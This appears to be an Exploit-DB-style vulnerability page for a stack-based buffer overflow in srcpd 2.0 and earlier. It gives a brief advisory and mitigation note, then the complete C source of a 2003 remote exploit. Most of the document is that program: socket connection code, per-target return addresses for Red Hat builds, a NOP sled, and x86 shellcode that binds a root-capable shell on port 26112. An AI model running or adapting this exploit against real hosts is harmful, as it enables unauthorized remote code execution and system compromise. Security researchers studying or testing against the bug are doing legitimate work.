header-logo
Suggest Exploit
vendor:
srcpd
by:
m00 Security
7.5
CVSS
HIGH
Stack-based Buffer Overflow
121
CWE
Product Name: srcpd
Affected Version From: srcpd version 2.0 and earlier
Affected Version To: srcpd version 2.0
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2003

Stack-based Buffer Overflow in srcpd

The srcpd commands in srcpd version 2.0 and earlier are vulnerable to stack-based buffer overflow attacks. This vulnerability allows an attacker to run arbitrary code on a vulnerable host by exploiting the lack of boundary checking in the affected functions.

Mitigation:

Apply the necessary patches or updates provided by the vendor.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/8467/info

Several stack-based buffer overflow vulnerabilities exist in multiple srcpd commands that may allow an attacker to run arbitrary code on a vulnerable host. The vulnerability is due to the lack of boundary checking in the affected functions, leading to stack overflow conditions.

An attacker may succesfully exploit this issue in order to gain access to a vulnerable system. 

/*
 *    m00 Security 
 * www.m00security.org 
 * srcpd  =< 2.0 remote exploit
 * 
 * Audited by h0snp && Over_G.
 * Programmed by h0snp.
 * 2003.
 * ----------
 * Contact: #m00 at irc.wom.ru
 */
 
 
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>

#define SCODELEN	148
#define NOP			0x90
#define RET			0xbf1fcb61






unsigned long int resolve(char *host)
{
	 long i;
	 struct hostent *he;
	 
	 i = inet_addr(host);
	 if (i < 0) 
	 {
	 	he = gethostbyname(host);
	 	if (!he) return (0);
      	 else           return (*(unsigned long *)he->h_addr);      	
  	 }
   	return (i);
}

 
int make_connect(char *address, unsigned short port)
{
	int sock,i;
	struct sockaddr_in peer;
	
	sock = socket(AF_INET,SOCK_STREAM,0);
	if (sock <= 0) return -1;
	
	if (!(i = resolve(address))) return -2; 
		else
		{
			peer.sin_family = AF_INET;
    		peer.sin_addr.s_addr = i;
			peer.sin_port = htons(port);
		}		
	if (!(connect(sock,(struct sockaddr *)&peer,sizeof peer))) return (sock);
		else { close(sock); return -3; }
}

unsigned char scode[]= 
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x66\xb3\x1\x51\xb1\x6\x51\xb1\x1"
"\x51\xb1\x2\x51\x8d\xc\x24\xcd\x80\xb3\x2\xb1\x2\x31\xc9\x51\x51\x51\x80"
"\xc1\x66\x66\x51\xb1\x2\x66\x51\x8d\xc\x24\xb2\x10\x52\x51\x50\x8d\xc\x24"
"\x89\xc2\x31\xc0\xb0\x66\xcd\x80\xb3\x1\x53\x52\x8d\xc\x24\x31\xc0\xb0\x66"
"\x80\xc3\x3\xcd\x80\x31\xc0\x50\x50\x52\x8d\xc\x24\xb3\x5\xb0\x66\xcd\x80"
"\x89\xc3\x31\xc9\x31\xc0\xb0\x3f\xcd\x80\x41\x31\xc0\xb0\x3f\xcd\x80\x31"
"\xdb\x53\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24\x8"
"\x31\xc9\x51\x53\x8d\xc\x24\x31\xc0\xb0\xb\xcd\x80\x31\xc0\xb0\x01\xcd\x80";


long get_esp(){	__asm__ ("movl %esp,%eax"); }

struct
{
	char* 		 type;
	long  		 ret;
	unsigned int rep;
} targets[]=
{
 {"Red Hat Linux 9.0 x86 srcpd 2.0 (build gcc 3.2.2)",RET,13},
 {"Red Hat Linux 9.0 x86 srcpd 2.0 (from rpm)",0xbf1fcba1,6},
 {"Red Hat Linux 7.3 x86 srcpd 2.0 (from rpm)",0x42931b51,6},
}, dumb;

void usage(char* name)
{
	int i;
	
	printf("\rSrcpd v2.0 remote exploit by m00 Security\n");
	printf("usage: %s -h <host> -p <port> -t <target> [-o <offset>] \n",name);
	printf("avialable targets:\n");
	for (i =0; i< sizeof(targets)/sizeof(dumb); i++)
		printf(" %3d / 0x%.8x / %s \n",i,targets[i].ret,targets[i].type);
	exit(0);
}

 

int main(int argc, char* argv[])
{	
	char* host,*buf,*rcvbuf;
	long  ret = RET/*get_esp()*/,*addr;
	int   rez,port=12340,sock,pos,i,trgt;

	if (argc < 4) usage(argv[0]);
	
	while ((rez = getopt(argc,argv,"h:p:o:t:")) != -1)
		switch (rez)
		{
			case 'h': host = optarg;       break;
			case 'p': port = atoi(optarg); break;
			case 'o': ret -= atol(optarg); break;
			case 't': trgt = atoi(optarg); break;				
			case '?': break;
		}
	printf(" ** ***************************************** **\n"); 		
	printf(" ** Srcpd v2.0 remote exploit by m00 Security **\n");
	printf(" ** ***************************************** **\n");
	printf(" Conneting...");
	if ((sock = make_connect(host,port)) <= 0)
	{
		perror(" connect()");
		exit(-1);		
	}
	ret = targets[trgt].ret;
	printf("OK\n using RET = 0x%x\n",ret);	
	buf    = (char*)malloc(220);
	rcvbuf = (char*)malloc(512);	
	pos = recv(sock,rcvbuf,512,0);	    
	printf(" Sending...");
	if (pos <= 0 || pos == EOF) return -1;	
	send(sock,"go 11111\r\n",10,0);	
	pos = recv(sock,rcvbuf,512,0);	    
	if (pos <= 0 || pos == EOF) return -1;
	memset(buf,NOP,200);
	memcpy(buf,"set 1 lock ",11);
	addr = (long*)(buf+11);
	for (i =0; i< targets[trgt].rep; i++)
		*(addr++) = ret;
	*(addr++) = '\x20';	
	memcpy(buf+targets[trgt].rep*4+12,scode,SCODELEN);
	buf[219] = '\0';
	printf("OK\n");	
	send(sock,buf,220,0);
	printf(" now, if you was lucky with ret, shell spawned on 26112.\n");
	free(buf);
	free(rcvbuf);
	close(sock);
	return 0; 
 }